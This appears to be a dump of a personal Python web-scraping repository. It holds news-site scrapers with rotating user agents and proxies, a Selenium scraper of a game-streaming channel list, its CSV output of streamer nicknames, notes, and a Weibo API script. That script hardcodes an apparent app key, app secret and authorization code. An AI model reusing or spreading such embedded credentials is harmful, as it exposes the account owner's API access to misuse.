645 | 位 646 | 做 647 | 停 648 | 顶 649 | 先 650 | 先前 651 | 全 652 | 公斤 653 | 其实 654 | 内 655 | 已 656 | 再 657 | 小 658 | 大 659 | 还 660 | 里 661 | 都 662 | 部 663 | 遍 664 | 道 665 | 说 666 | 只 667 | 后 668 | 太 669 | 看 670 | 年 671 | 很 672 | 才 673 | 时 674 | 更 675 | 最 676 | 本报 677 | 讯 678 | 演 679 | 片 -------------------------------------------------------------------------------- /spider/news/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 22:44 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/news/get_news_url.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/5 19:39 8 | @File : getNewsUrl.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | from lxml import etree 17 | import user_agent 18 | import random_ip 19 | 20 | url = 'https://news.hao123.com/wangzhi' 21 | re = requests.get(url, headers=user_agent.UserAgent().getRandomHeaders(), proxies = random_ip.RandomIp().getOneProxies()) 22 | html = re.text 23 | struct = etree.HTML(html) 24 | 25 | # with open("newUrl.txt",'w',encoding='utf-8') as f: 26 | # f.write(html) 27 | 28 | for i in range(1, 21): 29 | newName = struct.xpath('//*[@id="bd"]/div[1]/div/ul/li[' + str(i) + ']/h3/div/a/text()') 30 | href = struct.xpath('//*[@id="bd"]/div[1]/div/ul/li[' + str(i) + ']/h3/div/a/@href') 31 | print(newName, href) 32 | 33 | for i in range(1, 25): 34 | newName1 = struct.xpath('//*[@id="bd"]/div[2]/div/ul/li[' + str(i) + ']/h3/div/a/text()') 35 | href1 = struct.xpath('//*[@id="bd"]/div[2]/div/ul/li[' + str(i) + ']/h3/div/a/@href') 36 | print(newName1, href1) -------------------------------------------------------------------------------- /spider/news/new_pengpai.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/6 22:46 8 | @File : new_pengpai.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | import random_ip 17 | import user_agent 18 | from lxml import etree 19 | from bs4 import BeautifulSoup as bs 20 | 21 | # url = "https://www.thepaper.cn/channel_25951" 22 | # 23 | # proxies = randomIp.RandomIp().getOneProxies() 24 | # headers = userAgent.UserAgent().getRandomHeaders() 25 | # 26 | # re = requests.get(url, headers=headers, proxies=proxies) 27 | # html = re.text 28 | # with open("re.txt","w",encoding="utf-8") as f: 29 | # f.write(html) 30 | 31 | with open("re.txt","r",encoding="utf-8") as f: 32 | content = f.read() 33 | 34 | soup = bs(content,"html.parser") 35 | aList = soup.find_all("a") 36 | for a in aList: 37 | print(a.get('href')) 38 | -------------------------------------------------------------------------------- /spider/news/wallstreetcn.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 华尔街见闻 6 | -------------------------------- 7 | @Time : 2019/5/13 22:16 8 | @File : wallstreetcn.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | 17 | # 先拿到网页中要爬取部分的所有链接 18 | # url去重 19 | # scarpy-reids 20 | # 读取字段写到数据库 21 | 22 | # targetUrl = "https://wallstreetcn.com/kechuang" 23 | # 24 | # re = requests.get(targetUrl) 25 | # re.encoding=re.apparent_encoding 26 | # html = re.text 27 | # 28 | # with open("html.txt","w",encoding="utf-8") as f: 29 | # f.write(str(html)) 30 | 31 | import re 32 | import json 33 | 34 | 35 | def getWallstreetData(): 36 | with open("html.txt", "r", encoding="utf-8") as f: 37 | html = f.read() 38 | 39 | # 匹配获取文章列表页数据 40 | parten = r'' 41 | res = re.findall(parten, html) 42 | 43 | # 匹配结果转换成字典 44 | dictinfo = str2dict(res[0]) 45 | cachedResponseDic = dictinfo['cachedResponse'] 46 | 47 | # 遍历字典,匹配key 48 | for key, value in cachedResponseDic.items(): 49 | if "information-flow" in key: 50 | nextCursor = value.get('value').get('next_cursor') 51 | items = value.get('value').get('items') 52 | return nextCursor, items 53 | 54 | 55 | # json格式的字符串转换成字典(json) 56 | def str2dict(str): 57 | return json.loads(str) 58 | 59 | 60 | # dict中的数据入库 61 | def data2oracle(dict): 62 | print(dict) 63 | 64 | 65 | # 获取url的text 66 | def requestUrl(url): 67 | re = requests.get(url) 68 | re.encoding = re.apparent_encoding 69 | return re.text 70 | 71 | 72 | # 爬取指定个数的数据 73 | def getLimitData(url): 74 | returnJsonStr = requestUrl(url) 75 | jsonDict = str2dict(returnJsonStr) 76 | items = jsonDict['data']['items'] 77 | return items 78 | 79 | 80 | # 解析文章的详细信息,返回详细信息的字典 81 | def getArticleDetail(url): 82 | html = requestUrl(url) 83 | pass 84 | 85 | 86 | if __name__ == '__main__': 87 | nextCursor, pre20Items = getWallstreetData() 88 | 89 | # limit = 10 # 返回个数 90 | # url = "https://api.wallstreetcn.com/apiv1/content/information-flow?channel=kechuang&accept=article%2Cad&cursor=" + nextCursor + "&limit=" + str(limit) 91 | # allItems = pre20Items.extend(getLimitData(url)) 92 | # print(allItems) 93 | 94 | 95 | allItems = [] 96 | 97 | # 遍历所有items,合并所有信息,入库 98 | for itemDic in allItems: 99 | print(itemDic) 100 | detailDic = getArticleDetail(itemDic['resource']['uri']) 101 | 102 | # 合并两个字典itemDic与detailDic,返回最终结果入库 103 | result = {} 104 | 105 | # 已有的信息与详细信息合并后,数据入库 106 | data2oracle(result) 107 | -------------------------------------------------------------------------------- /spider/pachong/geckodriver.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/pachong/geckodriver.log -------------------------------------------------------------------------------- /spider/pachong/get_dynamic_data.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : selenium获取页面动态内容 6 | -------------------------------------- 7 | @File : get_dynamic_data.py 8 | @Time : 2018/4/26 16:55 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | from selenium import webdriver 17 | from selenium.webdriver.chrome.options import Options 18 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities 19 | from bs4 import BeautifulSoup as bs 20 | from pandas import DataFrame 21 | import time 22 | 23 | 24 | ## 1. 动态抓取页面 25 | chrome_options = webdriver.ChromeOptions() 26 | chrome_options.add_argument('--headless') 27 | chrome_options.add_argument('--disable-gpu') 28 | 29 | 30 | ## 2. 更改user-agent 31 | # chrome_options.add_argument('--user-agent=Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3') 32 | # chrome_options.add_argument('--user-agent=Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3') 33 | # chrome_options.add_argument('--user-agent=Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') 34 | chrome_options.add_argument('--user-agent=Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') 35 | 36 | driver = webdriver.Chrome(chrome_options=chrome_options) 37 | # PhantomJS 目前标记为不赞成,在未来版本中可能不支持,改用chrome的headless chrome 38 | # driver = webdriver.PhantomJS(executable_path="./phantomjs/bin/phantomjs") 39 | 40 | url = "https://www.huomao.com/channel/lol" 41 | 42 | # 获取页面全部内容 43 | driver.get(url) 44 | data = driver.page_source 45 | print(len(data)) 46 | 47 | # 获取网页截图 48 | # driver.save_screenshot("./screenshot/1.png") 49 | 50 | 51 | ## 3. 保存爬取内容到本地分析! 52 | with open("./page_source.txt", "w", encoding="utf-8") as f: 53 | f.write(driver.page_source) 54 | 55 | driver.quit() 56 | 57 | 58 | ## 4. 分析 59 | page_source = '' # 本地文件内容代替爬取结果str类型 60 | with open("./page_source.txt", "r", encoding="utf-8") as f: 61 | page_source = f.read() 62 | 63 | # 存储最终分析结果 64 | name = [] 65 | title = [] 66 | watching = [] 67 | 68 | # 开始解析 69 | soup = bs(page_source, "html.parser") 70 | channelList = soup.find("div", attrs={'id':"channellist"}) 71 | rooms = channelList.find_all("div", attrs={'class':"list-smallbox no-logo"}) 72 | # 获取每个房间中的主播信息 73 | for room in rooms: 74 | try: 75 | this_title = room.find("a")["title"] # title当作a的属性获取 76 | this_name = room.find("span", class_="nickname").text # bs 解析标签中的值 77 | this_watching = room.find("em", attrs={"class":"flr"}).find("span").text 78 | except: 79 | this_watching = room.find("div", class_="no-playing").text 80 | name.append(this_name) 81 | title.append(this_title) 82 | watching.append(this_watching) 83 | 84 | result = DataFrame({ 85 | "主播名":name, 86 | "节目名":title, 87 | "观看人数":watching 88 | }) 89 | 90 | result.to_csv("./result.csv", encoding = "utf_8_sig") 91 | -------------------------------------------------------------------------------- /spider/pachong/result.csv: -------------------------------------------------------------------------------- 1 | ,主播名,节目名,观看人数 2 | 0,猓狐狸°,【第一女刺客】你看见过我的小熊吗~,"6,163" 3 | 1,齐天小小圣,晚上闹一会儿天宫吧~,289 4 | 2,MrIvan,老司机带飞,2 5 | 3,、小许,这个主播有点皮,主播正在休息 6 | 4,-你心中的玮哥哥,很久不见。,主播正在休息 7 | 5,鱼长官卡兹克,祖安王者局.,主播正在休息 8 | 6,慕薛丶今年15,想我了来q群找我:167569325,主播正在休息 9 | 7,宿命小磊,问道爆发,主播正在休息 10 | 8,居委会K某人,贾克斯的故事第69集,主播正在休息 11 | 9,MonicaOvO,未来人类品牌日 DRvsPDQ,主播正在休息 12 | 10,旺仔大馒头,带你们看火狐大美妞,主播正在休息 13 | 11,EWG女子电竞,EWG-LOL,主播正在休息 14 | 12,末路^_^,雨里夜里,峡谷之巅等你。,主播正在休息 15 | 13,Yas1n,网四钻石AD辅助冲分,主播正在休息 16 | 14,我的EZ会发光哟,电一王者峡谷上分 目前钻1,主播正在休息 17 | 15,DAi黛王巡山,【黛】帮我想个标题吧,主播正在休息 18 | 16,lime,【光家族】有你们是我的骄傲^_^,主播正在休息 19 | 17,魔女小娜迦,老板屋内位子随便上,主播正在休息 20 | 18,✿๓浅浅,一个不会翻车的女司机(・(ェ)・),主播正在休息 21 | 19,隔壁老王丶1,ob韩服王者局,主播正在休息 22 | 20,国服第一米老鼠,定个小目标,今天8把鸡。,主播正在休息 23 | 21,佳璐是个小仙女,皮城小仙女 佳璐璐哦,主播正在休息 24 | 22,跳儿,网一直播掉分儿,主播正在休息 25 | 23,狼狼不是娘娘酱,狼酱:别人凭本事拿的人头,为啥说我送?,主播正在休息 26 | 24,FANGQING丶,网1钻石AD,主播正在休息 27 | 25,Da丶新,新仔的菜鸟之路~~~~,主播正在休息 28 | 26,小智齿,火猫最强辅助莫甘娜 一Q一个男朋友,主播正在休息 29 | 27,蓝花楹,蓝花楹,主播正在休息 30 | 28,江湖人称一条柴,12345678,主播正在休息 31 | 29,OopsLeo,10把定位,主播正在休息 32 | 30,我叫该隐,人马:学会上不了钻石请举报我!,主播正在休息 33 | 31,小进进i,小进进:火猫第一德莱文,主播正在休息 34 | 32,青椒ccccccccccc,绝对有你意想不到的惊喜!!,主播正在休息 35 | 33,Star.Still,新人女主播,主播正在休息 36 | 34,小安萌啊-承承,我的直播间,主播正在休息 37 | 35,主播Carry丶锋,锐文专场!,主播正在休息 38 | 36,冷锋UU,小丑皇的无情杀戮,主播正在休息 39 | 37,二娜丶,【二娜】牙疼,主播正在休息 40 | 38,一个人的游戏.,中单专场,主播正在休息 41 | 39,电竞潇洒哥,其实躺赢也是门技术,主播正在休息 42 | 40,三斧子不解释,玩会LOL,主播正在休息 43 | 41,7777智障肉肉,ADC与辅助的爱恨情仇,主播正在休息 44 | 42,火猫丶TVForsake,火猫丶TVForsake,主播正在休息 45 | 43,古力逗,没有技术可言 送仙豆的都是大哥,主播正在休息 46 | 44,蓝俊熙丶,看一波电影,主播正在休息 47 | 45,雨晨姑奶奶,手受伤过几天开摄像头,主播正在休息 48 | 46,丑的被嫉妒,丑怪:不是技术 却很皮,主播正在休息 49 | 47,温柔风亚索,.......,主播正在休息 50 | 48,泽拉图丶,泽拉图:土嗨主播上路英雄海,主播正在休息 51 | 49,An阿南。,ADC 小王子。,主播正在休息 52 | 50,李梓煜,李梓煜 新主播求订阅,主播正在休息 53 | 51,月半湾丶小帅,新人主播求订阅,主播正在休息 54 | 52,我其实很懒,一区钻5单排上分,主播正在休息 55 | 53,空城丶智少,中路,主播正在休息 56 | 54,【文帝】,阴阳判官德莱文,主播正在休息 57 | 55,bewhy!,dddd~~~,主播正在休息 58 | 56,东北昊天,东北昊天:户外,唠嗑来。,主播正在休息 59 | 57,广东丶隔壁老黄,练下JJ~,主播正在休息 60 | 58,单纯主播蓄蓄,四月活动收礼只收“萌”2角一个!,主播正在休息 61 | 59,请叫我大C,征服之海,主播正在休息 62 | -------------------------------------------------------------------------------- /spider/pachong/screenshot/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/pachong/screenshot/1.png -------------------------------------------------------------------------------- /spider/pachong/screenshot/bottom.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/pachong/screenshot/bottom.jpg -------------------------------------------------------------------------------- /spider/pachong/笔记.txt: -------------------------------------------------------------------------------- 1 | 2 | Selenium + Chrome Driver 操作爬取过程 3 | 4 | 问题: 5 | 1. PhantomJS 运行时标记为不赞成 6 | 解决方法:使用Headless Chrome替换 7 | 参考网页:https://blog.csdn.net/visual0522/article/details/79343917 8 | 9 | 2. 下载对应chrome 版本的chromedriver下载安装: 10 | 注:查看chrome版本,前两位对应版本号;将chrome driver添加到PATH系统路径中 11 | 参考网页:https://blog.csdn.net/huilan_same/article/details/51896672 12 | 13 | 3. bs解析 14 | this_title = room.find("a")["title"] # title当作a的属性获取 15 | this_name = room.find("span", class_="nickname").text # bs 解析标签中的值 16 | 17 | 主要区别: 18 | 1. 在使用动态网页爬取神器Selenium爬取网页时,获得的时网页的全部内容,包括实时显示更新的数据; 19 | 一般在静态页面中无法获取。 20 | 21 | 2. 在代码的编写上,主要区别在于最初获取页面内容上,主要使用webdriver.Chrome()获取目标页面的全部内容 22 | 其余部分的解析、提取关键内容,同静态页面的提取、解析方式相同。 23 | 24 | 参考连接: 25 | 1. 26 | python+Selenium2+chrome构建动态网页爬虫工具 https://blog.csdn.net/cjsafty/article/details/9206323 27 | 28 | 2. 29 | python中selenium操作下拉滚动条方法汇总 https://www.cnblogs.com/landhu/p/5761794.html 30 | 31 | 3. 32 | python+selenium+PhantomJS爬取网页动态加载内容 https://www.cnblogs.com/chenice/p/6994111.html 33 | (PhantomJS中的部分内容可用,仅参考driver之后的相关函数使用) 34 | 35 | -------------------------------------------------------------------------------- /spider/spider.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/spider.zip -------------------------------------------------------------------------------- /spider/wechat/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/6/7 15:21 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/weibo/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/14 18:39 8 | @File : __init__.py.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ -------------------------------------------------------------------------------- /spider/weibo/weibo_api.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/4/14 18:40 8 | @File : weiboAPI.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | from weibo import APIClient 16 | 17 | # 1.配置 18 | APP_KEY = '4073142975' 19 | APP_SECRET = '6e8a766757e8ae11b06f0e0bfc26b291' 20 | CALLBACK_URL = 'http://apps.weibo.com/heyshheyou' # 回调授权页面,用户完成授权后返回的页面 21 | 22 | # 2.调用APIClient生成client实例 23 | client = APIClient(app_key=APP_KEY, app_secret=APP_SECRET, redirect_uri=CALLBACK_URL) 24 | 25 | # 3.得到授权页面的url 26 | url = client.get_authorize_url() 27 | print(url) 28 | 29 | # 4.点击访问url,在浏览器端获得code 30 | code = '6ecdbf350f0680a6f00cc8c34ae721a6' 31 | req = client.request_access_token(code) 32 | client.set_access_token(req.get('access_token'), req.get('expires_in')) 33 | 34 | # 5.调用微博普通读取接口,返回最新的公共微博。 35 | # 接口详情见 https://open.weibo.com/wiki/2/statuses/public_timeline 36 | statuses = client.statuses__public_timeline()['statuses'] 37 | print(len(statuses)) 38 | # 6.输出部分信息 39 | for i in range(0, len(statuses)): 40 | print(u'昵称:' + statuses[i]['user']['screen_name']) 41 | print(u'简单介绍:' + statuses[i]['user']['description']) 42 | print(u'位置:' + statuses[i]['user']['location']) 43 | print(u'微博:' + statuses[i]['text']) 44 | print(statuses[i]) 45 | --------------------------------------------------------------------------------